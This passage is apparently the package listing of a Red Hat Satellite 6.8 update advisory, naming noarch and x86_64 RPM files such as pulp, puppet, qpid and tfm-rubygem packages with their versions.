pulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm pulp-katello-1.0.3-1.el7sat.noarch.rpm pulp-maintenance-2.21.3-1.el7sat.noarch.rpm pulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm pulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm pulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm pulp-puppet-tools-2.21.3-2.el7sat.noarch.rpm pulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm pulp-selinux-2.21.3-1.el7sat.noarch.rpm pulp-server-2.21.3-1.el7sat.noarch.rpm puppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm puppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm puppetserver-6.13.0-1.el7sat.noarch.rpm python-blinker-1.3-2.el7sat.noarch.rpm python-gnupg-0.3.7-1.el7ui.noarch.rpm python-gofer-2.12.5-7.el7sat.noarch.rpm python-gofer-qpid-2.12.5-7.el7sat.noarch.rpm python-kid-0.9.6-11.el7sat.noarch.rpm python-mongoengine-0.10.5-2.el7sat.noarch.rpm python-nectar-1.6.2-1.el7sat.noarch.rpm python-oauth2-1.5.211-8.el7sat.noarch.rpm python-pulp-bindings-2.21.3-1.el7sat.noarch.rpm python-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-common-2.21.3-1.el7sat.noarch.rpm python-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm python-pulp-integrity-2.21.3-2.el7sat.noarch.rpm python-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm python-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm python-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm python-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm python-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm python-pulp-streamer-2.21.3-1.el7sat.noarch.rpm python-qpid-1.35.0-5.el7.noarch.rpm python-semantic_version-2.2.0-6.el7sat.noarch.rpm python2-amqp-2.2.2-5.el7sat.noarch.rpm python2-ansible-runner-1.4.6-1.el7ar.noarch.rpm python2-anyjson-0.3.3-11.el7sat.noarch.rpm python2-apypie-0.2.2-1.el7sat.noarch.rpm python2-celery-4.0.2-9.el7sat.noarch.rpm python2-click-6.7-9.el7sat.noarch.rpm python2-crane-3.3.1-9.el7sat.noarch.rpm python2-daemon-2.1.2-7.el7at.noarch.rpm python2-django-1.11.29-1.el7sat.noarch.rpm python2-flask-0.12.2-4.el7sat.noarch.rpm python2-future-0.16.0-11.el7sat.noarch.rpm python2-isodate-0.5.4-12.el7sat.noarch.rpm python2-itsdangerous-0.24-15.el7sat.noarch.rpm python2-jinja2-2.10-10.el7sat.noarch.rpm python2-jmespath-0.9.0-6.el7_7.noarch.rpm python2-keycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm python2-kombu-4.0.2-13.el7sat.noarch.rpm python2-lockfile-0.11.0-10.el7ar.noarch.rpm python2-okaara-1.0.37-2.el7sat.noarch.rpm python2-pexpect-4.6-1.el7at.noarch.rpm python2-ptyprocess-0.5.2-3.el7at.noarch.rpm python2-vine-1.1.3-6.el7sat.noarch.rpm python2-werkzeug-0.12.2-5.el7sat.noarch.rpm python3-async-timeout-3.0.1-2.el7ar.noarch.rpm python3-attrs-19.3.0-3.el7ar.noarch.rpm python3-chardet-3.0.4-10.el7ar.noarch.rpm python3-dateutil-2.8.1-2.el7ar.noarch.rpm python3-idna-2.4-2.el7ar.noarch.rpm python3-idna-ssl-1.1.0-2.el7ar.noarch.rpm python3-prometheus-client-0.7.1-2.el7ar.noarch.rpm python3-receptor-satellite-1.2.0-1.el7sat.noarch.rpm python3-six-1.11.0-8.el7ar.noarch.rpm python3-typing-extensions-3.7.4.1-2.el7ar.noarch.rpm qpid-dispatch-tools-1.5.0-4.el7.noarch.rpm qpid-tools-1.36.0-28.el7amq.noarch.rpm receptor-0.6.3-1.el7ar.noarch.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm repoview-0.6.6-11.el7sat.noarch.rpm rhel8-kickstart-setup-0.0.2-1.el7sat.noarch.rpm rubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm rubygem-foreman_scap_client-0.4.6-1.el7sat.noarch.rpm rubygem-highline-1.7.8-3.el7sat.noarch.rpm rubygem-oauth-0.5.4-2.el7sat.noarch.rpm rubygem-rack-1.6.12-1.el7sat.noarch.rpm rubygem-rake-0.9.2.2-41.el7sat.noarch.rpm satellite-6.8.0-1.el7sat.noarch.rpm satellite-capsule-6.8.0-1.el7sat.noarch.rpm satellite-cli-6.8.0-1.el7sat.noarch.rpm satellite-common-6.8.0-1.el7sat.noarch.rpm satellite-debug-tools-6.8.0-1.el7sat.noarch.rpm satellite-installer-6.8.0.11-1.el7sat.noarch.rpm tfm-rubygem-actioncable-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionmailer-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionpack-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actiontext-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionview-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activejob-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activemodel-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activerecord-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activerecord-import-1.0.0-6.el7sat.noarch.rpm tfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.noarch.rpm tfm-rubygem-activestorage-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activesupport-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-addressable-2.6.0-1.el7sat.noarch.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm tfm-rubygem-amazing_print-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-ancestry-3.0.7-1.el7sat.noarch.rpm tfm-rubygem-anemone-0.7.2-22.el7sat.noarch.rpm tfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm tfm-rubygem-apipie-bindings-0.3.0-1.el7sat.noarch.rpm tfm-rubygem-apipie-dsl-2.2.2-2.el7sat.noarch.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm tfm-rubygem-apipie-rails-0.5.17-3.el7sat.noarch.rpm tfm-rubygem-audited-4.9.0-3.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.noarch.rpm tfm-rubygem-builder-3.2.4-1.el7sat.noarch.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm tfm-rubygem-coffee-rails-5.0.0-1.el7sat.noarch.rpm tfm-rubygem-coffee-script-2.4.1-4.el7sat.noarch.rpm tfm-rubygem-coffee-script-source-1.12.2-4.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm tfm-rubygem-connection_pool-2.2.2-2.el7sat.noarch.rpm tfm-rubygem-crass-1.0.6-1.el7sat.noarch.rpm tfm-rubygem-css_parser-1.4.7-3.el7sat.noarch.rpm tfm-rubygem-daemons-1.2.3-7.el7sat.noarch.rpm tfm-rubygem-deacon-1.0.0-4.el7sat.noarch.rpm tfm-rubygem-declarative-0.0.10-1.el7sat.noarch.rpm tfm-rubygem-declarative-option-0.1.0-1.el7sat.noarch.rpm tfm-rubygem-deep_cloneable-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-deface-1.5.3-2.el7sat.noarch.rpm tfm-rubygem-diffy-3.0.1-6.el7sat.noarch.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-erubi-1.9.0-1.el7sat.noarch.rpm tfm-rubygem-excon-0.58.0-3.el7sat.noarch.rpm tfm-rubygem-execjs-2.7.0-4.el7sat.noarch.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm tfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.noarch.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm tfm-rubygem-fast_gettext-1.4.1-3.el7sat.noarch.rpm tfm-rubygem-fog-aws-3.6.5-1.el7sat.noarch.rpm tfm-rubygem-fog-core-2.1.0-3.el7sat.noarch.rpm tfm-rubygem-fog-google-1.8.2-1.el7sat.noarch.rpm tfm-rubygem-fog-json-1.2.0-3.el7sat.noarch.rpm tfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.noarch.rpm tfm-rubygem-fog-libvirt-0.7.0-1.el7sat.noarch.rpm tfm-rubygem-fog-openstack-1.0.8-2.el7sat.noarch.rpm tfm-rubygem-fog-ovirt-1.2.5-1.el7sat.noarch.rpm tfm-rubygem-fog-vsphere-3.3.1-1.el7sat.noarch.rpm tfm-rubygem-fog-xml-0.1.2-8.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible-5.1.3-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_discovery-16.1.2-1.el7sat.noarch.rpm tfm-rubygem-foreman_hooks-0.3.16-2.el7sat.noarch.rpm tfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_leapp-0.1.6-1.el7sat.noarch.rpm tfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution-cockpit-3.3.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.noarch.rpm tfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.noarch.rpm tfm-rubygem-formatador-0.2.1-11.el7sat.noarch.rpm tfm-rubygem-friendly_id-5.3.0-1.el7sat.noarch.rpm tfm-rubygem-fx-0.5.0-1.el7sat.noarch.rpm tfm-rubygem-get_process_mem-0.2.1-3.el7sat.noarch.rpm tfm-rubygem-gettext-3.1.4-10.el7sat.noarch.rpm tfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.noarch.rpm tfm-rubygem-git-1.5.0-1.el7sat.noarch.rpm tfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.noarch.rpm tfm-rubygem-globalid-0.4.2-1.el7sat.noarch.rpm tfm-rubygem-google-api-client-0.23.9-3.el7sat.noarch.rpm tfm-rubygem-googleauth-0.6.7-3.el7sat.noarch.rpm tfm-rubygem-graphql-1.8.14-1.el7sat.noarch.rpm tfm-rubygem-graphql-batch-0.3.10-1.el7sat.noarch.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm tfm-rubygem-hammer_cli-2.1.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.noarch.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm tfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm tfm-rubygem-http-3.3.0-1.el7sat.noarch.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm tfm-rubygem-http-form_data-2.1.1-1.el7sat.noarch.rpm tfm-rubygem-httpclient-2.8.3-1.el7sat.noarch.rpm tfm-rubygem-i18n-1.8.2-1.el7sat.noarch.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-ipaddress-0.8.0-11.el7sat.noarch.rpm tfm-rubygem-jgrep-1.3.3-12.el7sat.noarch.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm tfm-rubygem-katello-3.16.0.11-1.el7sat.noarch.rpm tfm-rubygem-kubeclient-4.3.0-1.el7sat.noarch.rpm tfm-rubygem-ldap_fluff-0.4.7-5.el7sat.noarch.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm tfm-rubygem-locale-2.0.9-13.el7sat.noarch.rpm tfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm tfm-rubygem-loofah-2.4.0-1.el7sat.noarch.rpm tfm-rubygem-mail-2.7.1-1.el7sat.noarch.rpm tfm-rubygem-marcel-0.3.3-1.el7sat.noarch.rpm tfm-rubygem-memoist-0.16.0-1.el7sat.noarch.rpm tfm-rubygem-method_source-0.9.2-2.el7sat.noarch.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm tfm-rubygem-mimemagic-0.3.5-1.el7sat.noarch.rpm tfm-rubygem-mini_mime-1.0.2-1.el7sat.noarch.rpm tfm-rubygem-mini_portile2-2.4.0-1.el7sat.noarch.rpm tfm-rubygem-ms_rest-0.7.4-2.el7sat.noarch.rpm tfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.noarch.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm tfm-rubygem-net-ldap-0.16.1-1.el7sat.noarch.rpm tfm-rubygem-net-ping-2.0.1-3.el7sat.noarch.rpm tfm-rubygem-net-scp-1.2.1-3.el7sat.noarch.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-oauth-0.5.4-3.el7sat.noarch.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm tfm-rubygem-optimist-3.0.0-1.el7sat.noarch.rpm tfm-rubygem-os-1.0.0-1.el7sat.noarch.rpm tfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.noarch.rpm tfm-rubygem-parse-cron-0.1.4-4.el7sat.noarch.rpm tfm-rubygem-polyglot-0.3.5-3.el7sat.noarch.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm tfm-rubygem-prometheus-client-1.0.0-1.el7sat.noarch.rpm tfm-rubygem-promise.rb-0.7.4-1.el7sat.noarch.rpm tfm-rubygem-public_suffix-3.0.3-1.el7sat.noarch.rpm tfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.noarch.rpm tfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.noarch.rpm tfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.noarch.rpm tfm-rubygem-pulp_container_client-1.4.1-1.el7sat.noarch.rpm tfm-rubygem-pulp_file_client-1.0.1-1.el7sat.noarch.rpm tfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.noarch.rpm tfm-rubygem-pulpcore_client-3.4.1-1.el7sat.noarch.rpm tfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.noarch.rpm tfm-rubygem-quantile-0.2.0-3.el7sat.noarch.rpm tfm-rubygem-rabl-0.14.3-1.el7sat.noarch.rpm tfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm tfm-rubygem-rack-cors-1.0.2-1.el7sat.noarch.rpm tfm-rubygem-rack-jsonp-1.3.1-9.el7sat.noarch.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-rack-test-1.1.0-4.el7sat.noarch.rpm tfm-rubygem-rails-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.noarch.rpm tfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-rails-i18n-6.0.0-2.el7sat.noarch.rpm tfm-rubygem-railties-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-rainbow-2.2.1-5.el7sat.noarch.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm tfm-rubygem-rbovirt-0.1.7-4.el7sat.noarch.rpm tfm-rubygem-rbvmomi-2.2.0-3.el7sat.noarch.rpm tfm-rubygem-record_tag_helper-1.0.1-3.el7sat.noarch.rpm tfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-redhat_access-2.2.18-1.el7sat.noarch.rpm tfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.noarch.rpm tfm-rubygem-redis-4.1.2-2.el7sat.noarch.rpm tfm-rubygem-representable-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-responders-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm tfm-rubygem-retriable-3.1.2-1.el7sat.noarch.rpm tfm-rubygem-roadie-3.4.0-3.el7sat.noarch.rpm tfm-rubygem-roadie-rails-2.1.1-2.el7sat.noarch.rpm tfm-rubygem-robotex-1.0.0-21.el7sat.noarch.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm tfm-rubygem-ruby2ruby-2.4.2-3.el7sat.noarch.rpm tfm-rubygem-ruby_parser-3.10.1-2.el7sat.noarch.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm tfm-rubygem-runcible-2.13.0-2.el7sat.noarch.rpm tfm-rubygem-safemode-1.3.5-2.el7sat.noarch.rpm tfm-rubygem-scoped_search-4.1.9-1.el7sat.noarch.rpm tfm-rubygem-secure_headers-6.3.0-2.el7sat.noarch.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm tfm-rubygem-sexp_processor-4.10.0-5.el7sat.noarch.rpm tfm-rubygem-sidekiq-5.2.7-3.el7sat.noarch.rpm tfm-rubygem-signet-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm tfm-rubygem-sprockets-3.7.2-6.el7sat.noarch.rpm tfm-rubygem-sprockets-rails-3.2.1-6.el7sat.noarch.rpm tfm-rubygem-sshkey-1.9.0-3.el7sat.noarch.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm tfm-rubygem-stomp-1.4.9-1.el7sat.noarch.rpm tfm-rubygem-text-1.3.0-7.el7sat.noarch.rpm tfm-rubygem-thor-1.0.1-2.el7sat.noarch.rpm tfm-rubygem-thread_safe-0.3.6-5.el7sat.noarch.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm tfm-rubygem-timeliness-0.3.10-1.el7sat.noarch.rpm tfm-rubygem-tzinfo-1.2.6-1.el7sat.noarch.rpm tfm-rubygem-uber-0.1.0-1.el7sat.noarch.rpm tfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm tfm-rubygem-unicode-display_width-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.noarch.rpm tfm-rubygem-webpack-rails-0.9.8-6.el7sat.noarch.rpm tfm-rubygem-websocket-extensions-0.1.5-1.el7sat.noarch.rpm tfm-rubygem-will_paginate-3.1.7-3.el7sat.noarch.rpm tfm-rubygem-x-editable-rails-1.5.5-5.el7sat.noarch.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm tfm-rubygem-zeitwerk-2.2.2-1.el7sat.noarch.rpm
x86_64: createrepo_c-0.7.4-1.el7sat.x86_64.rpm createrepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm createrepo_c-libs-0.7.4-1.el7sat.x86_64.rpm foreman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm foreman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm hfsplus-tools-332.14-12.el7.x86_64.rpm hfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm libmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm libmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm libsolv-0.7.4-4.pulp.el7sat.x86_64.rpm libsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm libwebsockets-2.4.2-2.el7.x86_64.rpm libwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm livecd-tools-20.4-1.6.el7sat.x86_64.rpm mod_passenger-4.0.18-24.el7sat.x86_64.rpm mod_xsendfile-0.12-11.el7sat.x86_64.rpm mod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm ostree-2017.1-2.atomic.el7.x86_64.rpm ostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm pcp-mmvstatsd-0.4-2.el7sat.x86_64.rpm puppet-agent-6.14.0-2.el7sat.x86_64.rpm pycairo-1.16.3-9.el7sat.x86_64.rpm pycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm pygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm python-aiohttp-debuginfo-3.6.2-4.el7ar.x86_64.rpm python-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm python-bson-3.2-2.el7sat.x86_64.rpm python-imgcreate-20.4-1.6.el7sat.x86_64.rpm python-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm python-multidict-debuginfo-4.7.4-2.el7ar.x86_64.rpm python-psutil-5.0.1-3.el7sat.x86_64.rpm python-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm python-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm python-pymongo-3.2-2.el7sat.x86_64.rpm python-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm python-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm python-qpid-proton-0.28.0-3.el7.x86_64.rpm python-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm python-saslwrapper-0.22-5.el7sat.x86_64.rpm python-simplejson-3.2.0-1.el7sat.x86_64.rpm python-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm python-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm python-yarl-debuginfo-1.4.2-2.el7ar.x86_64.rpm python-zope-interface-4.0.5-4.el7.x86_64.rpm python-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm python2-billiard-3.5.0.3-3.el7sat.x86_64.rpm python2-gobject-3.28.3-2.el7sat.x86_64.rpm python2-gobject-base-3.28.3-2.el7sat.x86_64.rpm python2-markupsafe-0.23-21.el7sat.x86_64.rpm python2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm python2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm python2-twisted-16.4.1-12.el7sat.x86_64.rpm python3-aiohttp-3.6.2-4.el7ar.x86_64.rpm python3-multidict-4.7.4-2.el7ar.x86_64.rpm python3-yarl-1.4.2-2.el7ar.x86_64.rpm qpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-client-devel-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm qpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm qpid-dispatch-router-1.5.0-4.el7.x86_64.rpm qpid-proton-c-0.28.0-3.el7.x86_64.rpm qpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm qpid-qmf-1.36.0-28.el7amq.x86_64.rpm rh-postgresql12-postgresql-evr-0.0.2-1.el7sat.x86_64.rpm rubygem-facter-2.4.1-2.el7sat.x86_64.rpm rubygem-newt-0.9.6-3.el7sat.x86_64.rpm rubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm rubygem-passenger-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-debuginfo-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-native-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-native-libs-4.0.18-24.el7sat.x86_64.rpm saslwrapper-0.22-5.el7sat.x86_64.rpm saslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm tfm-rubygem-bcrypt-3.1.12-1.el7sat.x86_64.rpm tfm-rubygem-bcrypt-debuginfo-3.1.12-1.el7sat.x86_64.rpm tfm-rubygem-facter-2.4.0-6.el7sat.x86_64.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm tfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm tfm-rubygem-http_parser.rb-0.6.0-1.el7sat.x86_64.rpm tfm-rubygem-http_parser.rb-debuginfo-0.6.0-1.el7sat.x86_64.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-nio4r-2.5.2-2.el7sat.x86_64.rpm tfm-rubygem-nio4r-debuginfo-2.5.2-2.el7sat.x86_64.rpm tfm-rubygem-nokogiri-1.10.9-1.el7sat.x86_64.rpm tfm-rubygem-nokogiri-debuginfo-1.10.9-1.el7sat.x86_64.rpm tfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.x86_64.rpm tfm-rubygem-ovirt-engine-sdk-debuginfo-4.2.3-3.el7sat.x86_64.rpm tfm-rubygem-passenger-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-debuginfo-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-native-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-native-libs-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-pg-1.1.4-2.el7sat.x86_64.rpm tfm-rubygem-pg-debuginfo-1.1.4-2.el7sat.x86_64.rpm tfm-rubygem-puma-4.3.3-4.el7sat.x86_64.rpm tfm-rubygem-puma-debuginfo-4.3.3-4.el7sat.x86_64.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm 